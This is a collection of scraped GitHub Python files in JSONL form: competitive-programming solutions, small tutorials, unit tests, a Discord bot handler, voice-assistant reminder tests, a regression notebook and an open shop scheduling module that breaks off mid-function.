+{"seq_id":"18128871065","text":"from collections import Counter\n\nt = int(input())\nans = []\nfor i in range(t):\n was = set()\n temp = int(input())\n word = input()\n tr = True\n\n for ch in word:\n if ch not in was:\n was.add(ch)\n last_added = ch\n elif ch in was and ch == last_added:\n continue\n else:\n tr = False\n\n if tr:\n ans.append(\"YES\")\n else:\n ans.append(\"NO\")\n\nfor i in ans:\n print(i)\n","repo_name":"TOOFACK/DailyCodingPy","sub_path":"CF/719(Div3)/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71989221842","text":"import re\npattern='([0-9,D,T,A][a,m,h,s,c]){1}'\nmusiques=['1a0a(14)3aDa1a1aDa(13)1a','Da6a4a8a0a7a9aDa1a2a','6h9h4h(15)4s1hAs2s1h']\n\nprog = re.compile(pattern,flags=re.IGNORECASE)\nresult = prog.findall(musiques[2])\n\nfor group in result:\n print(group)\nprint('head')\n","repo_name":"jcambert/pmu_scrapper","sub_path":"musique.py","file_name":"musique.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"71817264083","text":"import unittest\nfrom hexagonal.apps.backend.public.app import app, db\n\nclass UnitTestBase(unittest.TestCase):\n\n def setUp(self):\n self.app = app.test_client()\n\n def assertResponse(self, endpoint: str, expectedStatusCode: int, expectedResponse):\n response = self.app.get(endpoint, headers={\"Content-Type\": \"application/json\"})\n\n self.assertEqual(expectedStatusCode, response.status_code)\n self.assertEqual(expectedResponse, response.json)\n \n def assertRequestWithBody(self, endpoint: str, body, expectedStatusCode: int):\n response = self.app.put(\n endpoint,\n headers={\"Content-Type\": \"application/json\"},\n data=body\n )\n\n self.assertEqual(expectedStatusCode, response.status_code)\n self.assertEqual(None, response.json)\n \n def tearDown(self):\n with app.app_context():\n db.session.execute(\"DELETE FROM services\")\n db.session.commit()","repo_name":"olimacorot/python-hexagonal","sub_path":"tests/apps/backend/unit_test_base.py","file_name":"unit_test_base.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"31033306617","text":"\"\"\"\nПример программы для работы с ООП\n\nСделать\n- добавить метод для вывода сообщений с префиксом имени\n- добавить метод для вывода информации об объекте\n- добавить конструктор класса для формирования полей\n\"\"\"\n\n\nclass Person:\n name: str\n surname: str\n age: int\n\n def __init__(self, first_name: str, last_name: str, age: int = 0):\n self.name = first_name\n self.surname = last_name\n self.age = age\n\n def info(self):\n print(f\"Объект класса Person: {self.name} {self.surname}, age: {self.age}\")\n\n def say_as(self, message):\n return f\"<{self.name}> {message}\"\n\n\nperson1 = Person('John', 'Doe', 43)\n\nprint(person1.name)\n\n\nperson2 = Person('John', 'Doe', 43)\n\nperson2.info()\n","repo_name":"onlycska/Messenger","sub_path":"src/day_02/01_person_methods.py","file_name":"01_person_methods.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"37440424016","text":"from intent import Intent, IntentName\nfrom typing import Optional\nimport discord\nimport random\n\nfrom handlers.handler import MessageHandler\n\n\nclass PlayAmongUs(MessageHandler):\n \"\"\"\n Respond cheeky messages to people who want to play Among Us\n \"\"\"\n\n def __init__(self):\n super().__init__(channels=[\"among-us\"], intent_names=[IntentName.play_among_us])\n\n def handle(self, message: discord.Message, intent: Intent) -> Optional[str]:\n if intent.probability > 0.9:\n return random.choice(\n [\n f\"{message.author.display_name} sus\",\n \"Seems like the perfect time to play among us\",\n \"Tell me more 🤔\",\n \"I wish I could 😞\",\n \"Beanie gang 4 lyfe\",\n \"We won't take no for an answer!\",\n ]\n )\n else:\n return None\n\n","repo_name":"schiegl/tuwien-ds-discord-bot","sub_path":"handlers/play_among_us.py","file_name":"play_among_us.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"11638385172","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport opengate as gate\nfrom opengate.tests import utility\nimport os\nimport subprocess\n\nif __name__ == \"__main__\":\n paths = utility.get_default_test_paths(__file__, \"\", output_folder=\"test032\")\n\n is_ok = True\n\n # test 1 = 10mm and with shell\n f1 = paths.output / \"iec_10mm.mhd\"\n f2 = paths.output / \"iec_source_10mm.mhd\"\n path_voxelize_script = os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"bin\", \"voxelize_iec_phantom\"\n )\n cmd = (\n f\"python {path_voxelize_script} -o {f1} \"\n f\"-s 10 \"\n f\"--output_source {f2} \"\n f\"-a 666 555 444 333 222 111 \"\n )\n print(cmd)\n # r = os.system(f\"{cmd}\")\n subprocess.call(cmd.split())\n\n # if r != 0:\n # is_ok = False\n\n # test 2 = 9mm and without shell\n f3 = paths.output / \"iec_9mm.mhd\"\n f4 = paths.output / \"iec_source_9mm.mhd\"\n cmd = (\n f\"python {path_voxelize_script} -o {f3} \"\n f\"-s 9 \"\n f\"--output_source {f4} \"\n f\"-a 111 222 333 444 555 666 \"\n f\"--no_shell \"\n )\n print(cmd)\n # r = os.system(f\"{cmd}\")\n subprocess.call(cmd.split())\n # if r != 0:\n # is_ok = False\n\n # compare images\n gate.exception.warning(\"\\nDifference with ref image\")\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_10mm.mhd\", f1, stats=None, tolerance=0.001\n )\n and is_ok\n )\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_source_10mm.mhd\", f2, stats=None, tolerance=0.001\n )\n and is_ok\n )\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_9mm.mhd\", f3, stats=None, tolerance=0.001\n )\n and is_ok\n )\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"iec_source_9mm.mhd\", f4, stats=None, tolerance=0.001\n )\n and is_ok\n )\n utility.test_ok(is_ok)\n","repo_name":"OpenGATE/opengate","sub_path":"opengate/tests/src/test032_voxelized_volume_source.py","file_name":"test032_voxelized_volume_source.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"}
+{"seq_id":"71530649043","text":"from datetime import datetime, timedelta\n\nscores = [\n 'complete blackout',\n 'incorrect response; the correct one remembered',\n 'incorrect response; where the correct one seemed easy to recall',\n 'correct response recalled with serious difficulty',\n 'correct response after a hesitation',\n 'perfect response'\n]\n\n\nclass Card(object):\n def __init__(self, idx, question, answer, first_practice, next_practice,\n streak, interval, easiness):\n self.idx = idx\n self.question = question\n self.answer = answer\n self.first_practice = first_practice\n self.next_practice = next_practice\n self.streak = int(streak) if streak else 0\n self.interval = float(interval) if interval else 1\n self.easiness = float(easiness) if easiness else 2.5\n self.question_picture = None\n self.answer_picture = None\n\n def update(self, score):\n if score < 3:\n self.streak = 0\n else:\n self.streak += 1\n\n self.easiness = max(\n 1.3, self.easiness + 0.1 - (5.0 - score) * (0.08 + (5.0 - score) * 0.02))\n\n if self.streak == 0:\n self.interval = 0\n elif self.streak == 1:\n self.interval = 1\n elif self.streak == 2:\n self.interval = 4\n else:\n self.interval = self.interval * self.easiness\n\n if not self.first_practice:\n self.first_practice = datetime.now().isoformat()\n\n self.next_practice = (\n datetime.now() + timedelta(days=self.interval)).isoformat()\n","repo_name":"gnvk/script.remember.everything","sub_path":"resources/lib/card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"33469733771","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n#Task:Mutiple Regression on data for India and Pakistan\n#Program By:Ayush Pandey\n#Email Id:1805290@kiit.ac.in\n#DATE:19-Oct-2021\n#Python Version:3.7\n#CAVEATS:None\n#LICENSE:None\n\n\n# In[2]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[3]:\n\n\n#For reading the csv file\ndf=pd.read_csv('data_2.csv')\n\n\n# In[4]:\n\n\ndf.head()\n\n\n# In[5]:\n\n\n#Comparing the Death of India and Pakistan based on Unsafe water source,Unsafe sanitation,No access to handwashing facility\ndf1=df.groupby(['Entity'],as_index=False).agg({'Unsafe water source':'sum','Unsafe sanitation':'sum','No access to handwashing facility':'sum'})\n\n\n# In[6]:\n\n\n#Storing all the data's where Entity is India and Pakistan\nIndia=df1[df1['Entity']=='India']\nPakistan=df1[df1['Entity']=='Pakistan']\n\n\n# In[7]:\n\n\nx=['Unsafe water source','Unsafe sanitation','No access to handwashing facility']\ny=[India['Unsafe water source'].item(),India['Unsafe sanitation'].item(),India['No access to handwashing facility'].item()]\ny1=[Pakistan['Unsafe water source'].item(),Pakistan['Unsafe sanitation'].item(),Pakistan['No access to handwashing facility'].item()]\nX_axis = np.arange(len(x))\nplt.bar(X_axis - 0.2,y,0.4,label=\"India\")\nplt.bar(X_axis + 0.2,y1,0.4,color=\"red\",label=\"Palkistan\")\nplt.xticks(rotation=90)\nplt.xlabel(['Unsafe water source','Unsafe sanitation','No access to handwashing facility'])\nplt.ylabel(\"No. of Death\")\nplt.legend()\nplt.show()\n\n\n# In[8]:\n\n\nIndia=df[df['Entity']=='India']\nPakistan=df[df['Entity']=='Pakistan']\n\n\n# In[9]:\n\n\nfrom sklearn.linear_model import LinearRegression\n\n\n# In[10]:\n\n\n#For India Doing Mutiple regression\n#Independent\nx=India[['Unsafe water source','Unsafe sanitation']]\n#Depenent\ny=India['No access to handwashing facility']\nmodel=LinearRegression()\nmodel.fit(x,y)\nprint(model.score(x,y)*100)\nprint(model.coef_)\n\n#This shows that the Unsafe water souce is the main cause for no access to handwashing facility as the coefficient value is more than 50%.\n\n\n# In[11]:\n\n\n#For Pakistan Doing Mutiple regression\n#Independent\nx=Pakistan[['Unsafe water source','Unsafe sanitation']]\n#Depenent\ny=Pakistan['No access to handwashing facility']\nmodel=LinearRegression()\nmodel.fit(x,y)\nprint(model.score(x,y)*100)\nprint(model.coef_)\n\n#This shows that the Unsafe sanitation souce is the main cause for no access to handwashing facility as the coefficient value is around 40%.\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"AyushPandey141/PythonTasks","sub_path":"Day15_MutipleRegression/MutipleRegression.py","file_name":"MutipleRegression.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29035820297","text":"import re\n\nimport alice.tests.library.auth as auth\nimport alice.tests.library.intent as intent\nimport alice.tests.library.surface as surface\nimport alice.tests.library.scenario as scenario\nimport pytest\nfrom alice.tests.library.vins_response import action, DivWrapper, DivIterableWrapper\nfrom cached_property import cached_property\n\n\nclass Memento(object):\n def __init__(self, alice, cleanup):\n self._alice = alice\n self._cleanup = cleanup\n\n def create_new(self, text):\n response = self._alice(text)\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n\n schedule_directive = None\n memento_directive = None\n\n for d in response.voice_response.uniproxy_directives:\n if 'context_save_directive' in d:\n schedule_directive = d.context_save_directive\n break\n\n for d in response.voice_response.directives:\n if d.name == 'update_memento':\n memento_directive = d\n\n assert schedule_directive is not None\n assert memento_directive is not None\n\n if self._cleanup:\n self._cleanup.add(schedule_directive)\n\n return response\n\n\n@pytest.fixture\ndef cleanup_reminder():\n class RemindersCleanup(object):\n def __init__(self):\n self._reminders = []\n\n def add(self, directive):\n self._reminders.append(directive.payload.Spec.Action.SendTechnicalPush.TechnicalPush.SpeechKitDirective.payload.typed_semantic_frame.reminders_on_shoot_semantic_frame.id.string_value)\n\n def clean(self):\n # TODO (petrk) Write cleanup here.\n pass\n\n reminders = RemindersCleanup()\n yield reminders\n reminders.clean()\n\n\nclass ReminderResponse(object):\n WhatTime = r'На какое время поставить напоминание\\?'\n WhatSubject = r'(О чём|Что).* напомнить\\?'\n\n\nclass RemindersCard(DivWrapper):\n class _Reminders(DivIterableWrapper):\n class _Item(DivWrapper):\n @action\n def cancel(self):\n return self.cancel_action\n\n def __init__(self, data):\n assert data.log_id == 'reminders_card'\n super().__init__(data.reminders_card)\n\n @property\n def header(self):\n assert self.card_items[0].type == 'reminders_header'\n return self.card_items[0].title\n\n @cached_property\n def reminders(self):\n return RemindersCard._Reminders(self.card_items[1:])\n\n\n@pytest.mark.supported_features('supports_device_local_reminders')\n@pytest.mark.parametrize('surface', [surface.searchapp])\nclass TestLocalReminders(object):\n owners = ('petrk', )\n\n def test_create(self, alice):\n response = alice('поставь напоминание поесть завтра в 8:00')\n assert response.scenario == scenario.Reminders\n assert response.text.lower() == 'вы успешно поставили напоминание \"поесть\" на завтра в 8 часов утра.'\n\n @pytest.mark.unsupported_features('div2_cards')\n def test_list_without_div2_cards(self, alice):\n response = alice('поставь напоминание поесть на завтра в 3 часа дня')\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний')\n assert response.scenario == scenario.Vins\n assert response.intent == intent.ListReminders\n assert 'установлено только одно' in response.text\n assert 'поесть на завтра' in response.text\n\n @pytest.mark.supported_features('div2_cards')\n def test_list_with_div2_cards(self, alice):\n response = alice('поставь напоминание поесть на завтра в 3 часа дня.')\n assert response.scenario == scenario.Reminders\n\n response = alice('поставь напоминание покормить кота на завтра в пять вечера.')\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний.')\n assert response.scenario == 
scenario.Vins\n assert response.intent == intent.ListReminders\n\n card = RemindersCard(response.div_card)\n assert len(card.reminders) == 2\n\n reminder = card.reminders[0]\n assert reminder.title == 'Поесть'\n assert reminder.description == 'завтра в 3 часа дня'\n assert reminder.cancel_action\n\n reminder = card.reminders[1]\n assert reminder.title == 'Покормить кота'\n assert reminder.description == 'завтра в 5 вечера'\n assert reminder.cancel_action\n\n def test_cancel_after_set(self, alice):\n response = alice('поставь напоминание поесть на завтра в 3 часа дня.')\n assert response.scenario == scenario.Reminders\n\n response = alice('поставь напоминание покормить кота на завтра в пять вечера.')\n assert response.scenario == scenario.Reminders\n\n response = alice('удали')\n assert 'успешно' in response.text\n assert 'удалил' in response.text\n\n def test_cancel_by_number_voice(self, alice):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n for command in commands:\n response = alice(command)\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний.')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n\n # это \"покормить котика\" в 13 часов.\n response = alice('удали второе')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n text = response.text.lower()\n for word in ['удалил', 'покормить котика', 'завтра', '13']:\n assert word in text\n\n @pytest.mark.supported_features('div2_cards')\n def test_cancel_by_number_button(self, alice):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n for command in commands:\n response = alice(command)\n assert response.scenario == scenario.Reminders\n\n response = alice('покажи список напоминаний.')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n\n card = RemindersCard(response.div_card)\n response = alice.click(card.reminders[0].cancel())\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n text = response.text.lower()\n for word in ['удалил', 'поесть', 'завтра', '15']:\n assert word in text\n\n\n@pytest.mark.oauth(auth.Yandex)\n@pytest.mark.supported_features('notifications')\n@pytest.mark.parametrize('surface', [surface.station, surface.loudspeaker])\nclass TestMementoReminders(object):\n owners = ('petrk', )\n\n def test_set(self, alice, cleanup_reminder):\n Memento(alice, cleanup_reminder).create_new('поставь напоминение поесть на завтра в 15:00')\n\n def test_cancel_after_set(self, alice, cleanup_reminder):\n Memento(alice, cleanup_reminder).create_new('поставь напоминение поесть на завтра в 15:00')\n\n response = alice('отмени это напоминание')\n assert response.scenario in {scenario.Vins, scenario.Reminders}\n assert 'отменила' in response.text.lower()\n\n assert len(response.voice_response.uniproxy_directives) == 1\n assert 'context_save_directive' in response.voice_response.uniproxy_directives[0]\n\n assert len(response.voice_response.directives) == 1\n assert 'update_memento' == response.voice_response.directives[0].name\n\n @pytest.mark.xfail(reason='Допилить когда юзера будут')\n def test_cancel_after_list(self, alice, cleanup_reminder):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика 
завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n memento = Memento(alice, cleanup_reminder)\n for command in commands:\n memento.create_new(command)\n\n def test_list(self, alice, cleanup_reminder):\n commands = [\n 'поставь напоминание поесть на завтра в 3 часа дня.',\n 'поставь напоминание покормить котика завтра в час дня.',\n 'поставь напоминание покумекать послезавтра в 15:00.',\n ]\n\n memento = Memento(alice, cleanup_reminder)\n for command in commands:\n memento.create_new(command)\n\n response = alice('покажи список напоминаний')\n\n assert response.text.lower().find('сейчас установлено') != -1\n\n \"\"\"\n card = RemindersCard(response.div_card)\n assert len(card.reminders) == 3\n reminder = card.reminders[0]\n assert reminder.title == 'Поесть'\n assert reminder.description == 'завтра в 3 часа дня'\n assert reminder.cancel_action\n\n reminder = card.reminders[1]\n assert reminder.title == 'Покормить кота'\n assert reminder.description == 'завтра в 5 вечера'\n assert reminder.cancel_action\n \"\"\"\n\n\n@pytest.mark.xfail(reason='Эти тесты старых ремайндеров, их надо перенести, но сейчас такой возможности нет т.к. сейчас ремайндеры копяться у пользователя, ждем отдельных юзеров')\n@pytest.mark.oauth(auth.Yandex)\n@pytest.mark.parametrize('surface', [surface.station, surface.loudspeaker])\nclass TestReminders(object):\n owners = ('petrk', )\n\n def test_reminder_ellipsis_time(self, alice):\n response = alice('напомни приготовить ужин')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatTime, response.text)\n\n response = alice('на завтра в 19 часов')\n assert response.intent == intent.CreateReminderEllipsis\n assert response.text == 'Поставила напоминание \\\"приготовить ужин\\\" на завтра в 19:00.'\n\n def test_reminder_ellipsis_what(self, alice):\n response = alice('поставь напоминание на завтра на 20 часов')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatSubject, response.text)\n\n response = alice('приготовить ужин')\n assert response.intent == intent.CreateReminderEllipsis\n assert response.text == 'Поставила напоминание \\\"приготовить ужин\\\" на завтра в 20:00.'\n\n def test_reminder_create_and_cancel(self, alice):\n response = alice('поставь напоминание на завтра сходить погулять в 18 часов')\n assert response.intent == intent.CreateReminder\n assert response.text == 'Поставила напоминание \\\"сходить погулять\\\" на завтра в 18:00.'\n\n response = alice('отмени')\n assert response.intent == intent.CreateReminderCancel\n assert response.text.startswith('Отменила это напоминание.')\n\n def test_reminder_cancel_while_create(self, alice):\n response = alice('напомни приготовить ужин')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatTime, response.text)\n\n response = alice('отмена')\n assert response.intent == intent.CreateReminderCancel\n assert response.text.startswith('Хорошо, отменила.')\n\n @pytest.mark.xfail(reason='https://st.yandex-team.ru/DIALOG-7472')\n def test_reminder_with_cancel_text(self, alice):\n response = alice('поставь напоминание на завтра 20 часов')\n assert response.intent == intent.CreateReminder\n assert re.fullmatch(ReminderResponse.WhatSubject, response.text)\n\n response = alice('закончить')\n assert response.intent == intent.CreateReminderEllipsis\n assert response.text == 'Поставила напоминание \\\"закончить\\\" на завтра в 20:00.'\n\n response = alice('Поставь напоминание на 
завтра на 5 часов хватит это терпеть')\n assert response.intent == intent.CreateReminder\n assert response.text == 'Поставила напоминание \\\"хватит это терпеть\\\" на завтра в 5:00.'\n\n # ALICE-7832\n def test_reminder_regex_tagger_issues_fix(self, alice):\n response = alice('Алиса, поставь напоминание на завтра в девять часов тридцать утра вынести мусор')\n assert response.intent == intent.CreateReminder\n assert response.text == 'Поставила напоминание \\\"вынести мусор\\\" на завтра в 9:30.'\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Voice Assistant tests/tests/integration_tests/reminders_and_todos/reminders.py","file_name":"reminders.py","file_ext":"py","file_size_in_byte":14325,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29788563086","text":"from __future__ import print_function, division\n\nimport sys\n\nimport matplotlib.patches as mpatch\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom copy import deepcopy\nfrom itertools import groupby, chain\n\n\n# # Read processing times from the file\n# def parse_problem(filename, k=1):\n# \"\"\"Parse the kth instance of a Taillard problem file\n#\n# The Taillard problem files are a standard benchmark set for the problem\n# of flow shop scheduling. They can be found online at the following address:\n# - http://mistic.heig-vd.ch/taillard/problemes.dir/ordonnancement.dir/ordonnancement.html\"\"\"\n#\n# with open(filename, 'r') as f:\n# # Identify the string that separates instances\n# problem_line = '/number of jobs, number of machines, time seed, machine seed, upper bound, lower bound :/'\n#\n# # Strip spaces and newline characters from every line\n# lines = map(str.strip, f.readlines())\n#\n# # We prep the first line for later\n# lines[0] = '/' + lines[0]\n#\n# # We also know '/' does not appear in the files, so we can use it as\n# # a separator to find the right lines for the kth problem instance\n# try:\n# proctimes = '/'.join(lines).split(problem_line)[k].split('/machines')[0].split('/')[2:]\n# machines = '/'.join(lines).split(problem_line)[k].split('/machines')[1].split('/')[1:]\n# except IndexError:\n# max_instances = len('/'.join(lines).split(problem_line)) - 1\n# print(\"\\nError: Instance must be within 1 and %d\\n\" % max_instances)\n# sys.exit(0)\n#\n# # Split every line based on spaces and convert each item to an int\n# data = [map(int, line.split()) for line in proctimes]\n#\n# machines = [map(int, line.split()) for line in machines]\n#\n# # We return the zipped data to rotate the rows and columns, making each\n# # item in data the durations of tasks for a particular job\n# return data, machines\n#\n#\n# filename = 'instances/Openshop/tai5_5.txt'\n# processing_times, machines = parse_problem(filename, 1) # a list of [job number] [machine number]\n# numberOfJobs = len(processing_times)\n# numberOfMachines = len(processing_times[0])\n# NDIM = numberOfMachines * numberOfJobs\n# # print(processing_times)\n#\n#\n# new_ptimes = []\n# for idx, job in enumerate(processing_times):\n# newlist = sorted(zip(machines[idx], job))\n# ptimes_inorder = [element[1] for element in newlist]\n# new_ptimes.append(ptimes_inorder)\n#\n# numberOfMachines = 4\n# numberOfJobs = 4\n# processing_times = [item for sublist in new_ptimes for item in sublist]\n# operation_numbers_dictionary = {i: (i % numberOfMachines, i // numberOfMachines)\n# for i in range(NDIM)} # i : (machine number, job number)\n\n\nclass Problem(object):\n \"\"\"\n Reads and parses Open Shop Scheduling Problem\n \"\"\"\n\n def __init__(self, filename, instance):\n self.filename = filename\n self.instance = instance\n self.numberOfJobs = 0\n self.numberOfMachines = 0\n self.processing_times = None\n self.operation_numbers_dictionary = None\n self.dimension = 0\n self.machineOrder = None\n self.due_dates = None\n self.parse_problem()\n\n def parse_problem(self):\n \"\"\"Parse the kth instance of a Taillard problem file\n\n The Taillard problem files are a standard benchmark set for the problem\n of flow shop scheduling. 
They can be found online at the following address:\n - http://mistic.heig-vd.ch/taillard/problemes.dir/ordonnancement.dir/ordonnancement.html\"\"\"\n\n with open(self.filename, 'r') as f:\n # Identify the string that separates instances\n problem_line = '/number of jobs, number of machines, time seed, machine seed, upper bound, lower bound :/'\n\n # Strip spaces and newline characters from every line\n lines = list(map(str.strip, f.readlines()))\n\n # We prep the first line for later\n lines[0] = '/' + lines[0]\n\n # We also know '/' does not appear in the files, so we can use it as\n # a separator to find the right lines for the kth problem instance\n try:\n proctimes = '/'.join(lines).split(problem_line)[self.instance].split('/machines')[0].split('/')[2:]\n machines = '/'.join(lines).split(problem_line)[self.instance].split('/machines')[1].split('/')[1:]\n except IndexError:\n max_instances = len('/'.join(lines).split(problem_line)) - 1\n print(\"\\nError: Instance must be within 1 and %d\\n\" % max_instances)\n sys.exit(0)\n\n # Split every line based on spaces and convert each item to an int\n self.processing_times = [list(map(int, line.split())) for line in proctimes]\n\n self.numberOfJobs = len(self.processing_times)\n self.numberOfMachines = len(self.processing_times[0])\n self.dimension = self.numberOfJobs * self.numberOfMachines\n\n self.operation_numbers_dictionary = {i: (i % self.numberOfMachines, i // self.numberOfMachines)\n for i in range(self.dimension)} # Operation : (Machine Nu., Job Nu.)\n\n self.machineOrder = [map(int, line.split()) for line in machines]\n\n self.sort_problem()\n\n def sort_problem(self):\n new_ptimes = np.zeros((self.numberOfJobs, self.numberOfMachines), dtype=np.uint8)\n for i, job in enumerate(self.processing_times):\n newlist = sorted(zip(self.machineOrder[i], job))\n for j, ptime in enumerate(newlist):\n new_ptimes[i, j] = ptime[1]\n self.due_dates = np.sum(new_ptimes, axis=1) # tight due dates\n self.processing_times = new_ptimes.flatten()\n\n\ndef gannt_chart(problem, schedule):\n \"\"\" \n Compiles a scheduling on the machines given a permutation of jobs \n with no time gap checking\n \"\"\"\n\n flag_print = False\n\n # Note that using [[]] * m would be incorrect, as it would simply\n # copy the same list m times (as opposed to creating m distinct lists).\n gantt_chart = [[] for _ in range(problem.numberOfMachines)]\n\n for operation in schedule:\n machine_number = problem.operation_numbers_dictionary[operation][0]\n job_number = problem.operation_numbers_dictionary[operation][1]\n proc_time = problem.processing_times[operation]\n\n # check if this job is being processed in any other machine\n completion_time_list = []\n time_interval_list = []\n for machine in range(problem.numberOfMachines):\n # dont check the machine to be scheduled since one job can be scheduled only once.\n # Check other machines\n if machine != machine_number:\n # check if the other machines had operations scheduled before\n if len(gantt_chart[machine]) != 0:\n for j in range(len(gantt_chart[machine])):\n # check the job numbers on other machines\n # and determine if the machine processed an operation of the job\n # to be scheduled now\n if gantt_chart[machine][j][0] == job_number:\n # put completion times of the job on other machines into a list\n s_time = gantt_chart[machine][j][1] # start time of the job on the other machine\n c_time = gantt_chart[machine][j][-1] # completion time of the job on other machine\n completion_time_list.append(c_time)\n 
time_interval_list.append((s_time, c_time))\n time_interval_list.sort(key=lambda x: x[0])\n\n # determine the maximum completion time for this job on other machines\n if len(completion_time_list) != 0:\n other_machine_ending_time = max(completion_time_list)\n\n else:\n # this job has no previous operation\n other_machine_ending_time = 0\n\n # determine the completion time of the last operation (available time) on the required machine\n num_of_jobs_on_current_machine = len(gantt_chart[machine_number])\n if num_of_jobs_on_current_machine == 0:\n current_machine_available_time = 0\n else:\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n\n f_intersection = True\n while True:\n if len(time_interval_list) != 0:\n for times in time_interval_list:\n\n intersection = range(max(current_machine_available_time, times[0]),\n min(current_machine_available_time + proc_time, times[1]))\n # intersection = min(proc_time, times[1]) + 1 - max(current_machine_available_time, times[0])\n if len(intersection) > 0:\n current_machine_available_time = times[1]\n f_intersection = True\n break\n else:\n f_intersection = False\n else:\n break\n\n if not f_intersection:\n break\n\n completion_time = current_machine_available_time + proc_time\n gantt_chart[machine_number].append((job_number, current_machine_available_time,\n proc_time, completion_time))\n return gantt_chart\n\n\ndef gannt_chart2(problem, schedule):\n \"\"\"Compiles a scheduling on the machines given a permutation of jobs\n with checikng time gaps\"\"\"\n\n flag_print = False\n\n # Note that using [[]] * m would be incorrect, as it would simply\n # copy the same list m times (as opposed to creating m distinct lists).\n gantt_chart = [[] for _ in range(problem.numberOfMachines)]\n\n for operation in schedule:\n machine_number = problem.operation_numbers_dictionary[operation][0]\n job_number = problem.operation_numbers_dictionary[operation][1]\n proc_time = problem.processing_times[operation]\n\n # check if this job is being processed in any other machine\n completion_time_list = []\n time_interval_list = []\n for machine in range(problem.numberOfMachines):\n # dont check the machine to be scheduled since one job can be scheduled only once.\n # Check other machines\n if machine != machine_number:\n # check if the other machines had operations scheduled before\n if len(gantt_chart[machine]) != 0:\n for j in range(len(gantt_chart[machine])):\n # check the job numbers on other machines\n # and determine if the machine processed an operation of the job\n # to be scheduled now\n if gantt_chart[machine][j][0] == job_number:\n # put completion times of the job on other machines into a list\n s_time = gantt_chart[machine][j][1] # start time of the job on the other machine\n c_time = gantt_chart[machine][j][-1] # completion time of the job on other machine\n completion_time_list.append(c_time)\n time_interval_list.append((s_time, c_time))\n time_interval_list.sort(key=lambda x: x[0])\n\n # determine the maximum completion time for this job on other machines\n if len(completion_time_list) != 0:\n other_machine_ending_time = max(completion_time_list)\n\n else:\n # this job has no previous operation\n other_machine_ending_time = 0\n\n # determine the completion time of the last operation (available time) on the required machine\n num_of_jobs_on_current_machine = len(gantt_chart[machine_number])\n gaps = []\n if num_of_jobs_on_current_machine == 0:\n current_machine_available_time = 0\n current_machine_available_time = 
check_intersection(time_interval_list, proc_time,\n current_machine_available_time)\n else:\n # find gaps and put them in a list\n for i in range(num_of_jobs_on_current_machine):\n if i == 0:\n first_job_start_time = gantt_chart[machine_number][i][1] - 0\n if first_job_start_time > 0:\n gaps.append((0, first_job_start_time))\n else:\n following_job_start_time = gantt_chart[machine_number][i][1]\n previous_job_end_time = gantt_chart[machine_number][i - 1][3]\n time_gap = following_job_start_time - previous_job_end_time\n if time_gap > 0:\n gaps.append((previous_job_end_time, following_job_start_time))\n\n if len(gaps) == 0:\n # there are no gaps so the current available time is the last operation completion time\n current_machine_available_time = gantt_chart[machine_number][-1][-1]\n # check if there are no operation of the job on other machines and if there is an\n # intersection delay the current machine available time\n current_machine_available_time = check_intersection(time_interval_list, proc_time,\n current_machine_available_time)\n else: # there are gaps\n flag_break_loop = False\n for times in gaps:\n # check if the operation processing time fits in the time gaps on this machine\n if times[1] - times[0] >= proc_time:\n # If operation processing time fits the time gap, then current machine is available\n # at the start of the time gap so set it with times[0]\n current_machine_available_time = times[0]\n if len(time_interval_list) != 0:\n # check if this gap intersects with other machines\n for times in 